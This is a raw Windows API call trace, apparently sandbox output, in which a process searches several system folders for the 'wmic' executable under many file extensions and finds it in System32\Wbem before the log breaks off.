GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.877] SetErrorMode (uMode=0x1) returned 0x1 [0255.877] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.877] SetErrorMode (uMode=0x1) returned 0x1 [0255.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.877] SetErrorMode (uMode=0x1) returned 0x1 [0255.878] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.878] SetErrorMode (uMode=0x1) returned 0x1 [0255.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.879] SetErrorMode (uMode=0x1) returned 0x1 [0255.879] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.879] SetErrorMode (uMode=0x1) returned 0x1 [0255.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.880] SetErrorMode (uMode=0x1) returned 0x1 [0255.880] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.880] SetErrorMode (uMode=0x1) returned 0x1 [0255.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.881] SetErrorMode (uMode=0x1) returned 0x1 [0255.881] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.881] SetErrorMode (uMode=0x1) returned 0x1 [0255.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.882] SetErrorMode (uMode=0x1) returned 0x1 [0255.882] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.882] SetErrorMode (uMode=0x1) returned 0x1 [0255.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.883] SetErrorMode (uMode=0x1) returned 0x1 [0255.883] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.883] SetErrorMode (uMode=0x1) returned 0x1 [0255.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.883] SetErrorMode (uMode=0x1) returned 0x1 [0255.883] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.884] SetErrorMode (uMode=0x1) returned 0x1 [0255.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.884] SetErrorMode (uMode=0x1) returned 0x1 [0255.884] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.884] SetErrorMode (uMode=0x1) returned 0x1 [0255.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.885] SetErrorMode (uMode=0x1) returned 0x1 [0255.885] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.885] SetErrorMode (uMode=0x1) returned 0x1 [0255.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.886] SetErrorMode (uMode=0x1) returned 0x1 [0255.886] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.886] SetErrorMode (uMode=0x1) returned 0x1 [0255.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0255.886] SetErrorMode (uMode=0x1) returned 0x1 [0255.886] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.887] SetErrorMode (uMode=0x1) returned 0x1 [0255.887] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.887] SetErrorMode (uMode=0x1) returned 0x1 [0255.887] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.887] SetErrorMode (uMode=0x1) returned 0x1 [0255.888] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.888] SetErrorMode (uMode=0x1) returned 0x1 [0255.888] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.888] SetErrorMode (uMode=0x1) returned 0x1 [0255.888] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.888] SetErrorMode (uMode=0x1) returned 0x1 [0255.889] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.889] SetErrorMode (uMode=0x1) returned 0x1 [0255.889] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.889] SetErrorMode (uMode=0x1) returned 0x1 [0255.889] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.890] SetErrorMode (uMode=0x1) returned 0x1 [0255.890] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.890] SetErrorMode (uMode=0x1) returned 0x1 [0255.890] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.890] SetErrorMode (uMode=0x1) returned 0x1 [0255.890] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.891] SetErrorMode (uMode=0x1) returned 0x1 [0255.891] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.891] SetErrorMode (uMode=0x1) returned 0x1 [0255.891] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.891] SetErrorMode (uMode=0x1) returned 0x1 [0255.891] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.892] SetErrorMode (uMode=0x1) returned 0x1 [0255.892] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.892] SetErrorMode (uMode=0x1) returned 0x1 [0255.892] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.892] SetErrorMode (uMode=0x1) returned 0x1 [0255.893] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.893] SetErrorMode (uMode=0x1) returned 0x1 [0255.893] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.893] SetErrorMode (uMode=0x1) returned 0x1 [0255.893] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.893] SetErrorMode (uMode=0x1) returned 0x1 [0255.894] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.895] SetErrorMode (uMode=0x1) returned 0x1 [0255.895] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.895] SetErrorMode (uMode=0x1) returned 0x1 [0255.895] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.896] SetErrorMode (uMode=0x1) returned 0x1 [0255.896] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.896] SetErrorMode (uMode=0x1) returned 0x1 [0255.896] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.897] SetErrorMode (uMode=0x1) returned 0x1 [0255.897] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.897] SetErrorMode (uMode=0x1) returned 0x1 [0255.897] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.897] SetErrorMode (uMode=0x1) returned 0x1 [0255.897] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.898] SetErrorMode (uMode=0x1) returned 0x1 [0255.898] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.898] SetErrorMode (uMode=0x1) returned 0x1 [0255.898] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0255.898] SetErrorMode (uMode=0x1) returned 0x1 [0255.898] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.899] SetErrorMode (uMode=0x1) returned 0x1 [0255.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0255.899] SetErrorMode (uMode=0x1) returned 0x1 [0255.899] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.899] SetErrorMode (uMode=0x1) returned 0x1 [0255.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0255.900] SetErrorMode (uMode=0x1) returned 0x1 [0255.900] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.900] SetErrorMode (uMode=0x1) returned 0x1 [0255.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0255.901] SetErrorMode (uMode=0x1) returned 0x1 [0255.901] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.901] SetErrorMode (uMode=0x1) returned 0x1 [0255.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0255.901] SetErrorMode (uMode=0x1) returned 0x1 [0255.901] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0255.902] SetErrorMode (uMode=0x1) returned 0x1 [0255.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c84cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0255.902] SetErrorMode (uMode=0x1) returned 0x1 [0255.902] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c84d080 | out: lpFindFileData=0x1c84d080*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, 